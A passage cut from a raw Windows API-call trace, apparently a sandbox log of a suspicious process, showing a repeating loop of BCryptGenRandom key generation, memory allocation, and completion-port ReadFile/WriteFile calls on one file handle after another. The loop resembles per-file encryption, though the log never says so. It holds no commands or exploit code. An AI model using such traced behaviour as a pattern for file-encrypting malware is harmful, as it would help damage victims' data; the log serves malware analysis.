lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.855] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.855] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.864] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.864] CloseHandle (hObject=0x2a8) returned 1 [0203.864] free (_Block=0x3df0008) [0203.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.870] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.871] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.871] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.871] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.871] free (_Block=0x3e305b8) [0203.871] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.871] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.872] free (_Block=0x1fa91d0) [0203.872] free (_Block=0x1fa2ed8) [0203.872] free (_Block=0x1fa90b8) [0203.872] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.872] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.872] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.881] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.881] CloseHandle (hObject=0x2a8) returned 1 [0203.881] free (_Block=0x3df0008) [0203.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.887] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.887] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.887] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.888] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.888] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.888] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.888] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.888] free (_Block=0x3e305b8) [0203.888] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.888] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.888] free (_Block=0x1fa91d0) [0203.888] free (_Block=0x1fa2ed8) [0203.888] free (_Block=0x1fa90b8) [0203.888] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.889] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.897] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.897] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.897] CloseHandle (hObject=0x2a8) returned 1 [0203.898] free (_Block=0x3df0008) [0203.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.904] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.905] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.905] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.905] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.905] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.905] free (_Block=0x3e305b8) [0203.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.905] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.906] free (_Block=0x1fa91d0) [0203.906] free (_Block=0x1fa2ed8) [0203.906] free (_Block=0x1fa90b8) [0203.906] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.906] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.916] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x78, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.916] CloseHandle (hObject=0x2a8) returned 1 [0203.916] free (_Block=0x3df0008) [0203.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.924] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.924] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.924] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.924] free (_Block=0x3e305b8) [0203.924] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.924] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.924] free (_Block=0x1fa91d0) [0203.924] free (_Block=0x1fa2ed8) [0203.924] free (_Block=0x1fa90b8) [0203.924] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.925] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.925] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.934] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.934] CloseHandle (hObject=0x2a8) returned 1 [0203.934] free (_Block=0x3df0008) [0203.934] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.939] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.940] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.940] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.940] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.940] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.940] free (_Block=0x3e305b8) [0203.940] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.940] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.941] free (_Block=0x1fa91d0) [0203.941] free (_Block=0x1fa2ed8) [0203.941] free (_Block=0x1fa90b8) [0203.941] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.941] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.949] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.949] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.949] CloseHandle (hObject=0x2a8) returned 1 [0203.950] free (_Block=0x3df0008) [0203.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.955] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.956] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.956] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.956] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.956] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.956] free (_Block=0x3e305b8) [0203.956] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.957] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.957] free (_Block=0x1fa91d0) [0203.957] free (_Block=0x1fa2ed8) [0203.957] free (_Block=0x1fa90b8) [0203.957] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.957] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.966] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.967] CloseHandle (hObject=0x2a8) returned 1 [0203.967] free (_Block=0x3df0008) [0203.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.973] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.973] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.973] free (_Block=0x3e305b8) [0203.974] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.974] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.974] free (_Block=0x1fa91d0) [0203.974] free (_Block=0x1fa2ed8) [0203.974] free (_Block=0x1fa90b8) [0203.974] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.974] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.975] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.983] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x154, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.983] CloseHandle (hObject=0x2a8) returned 1 [0203.983] free (_Block=0x3df0008) [0203.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.990] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.990] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.990] free (_Block=0x3e305b8) [0203.990] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.990] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.991] free (_Block=0x1fa91d0) [0203.991] free (_Block=0x1fa2ed8) [0203.991] free (_Block=0x1fa90b8) [0203.991] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.991] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.991] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.000] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x91, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0204.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0204.000] CloseHandle (hObject=0x2a8) returned 1 [0204.000] free (_Block=0x3df0008) [0204.000] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, 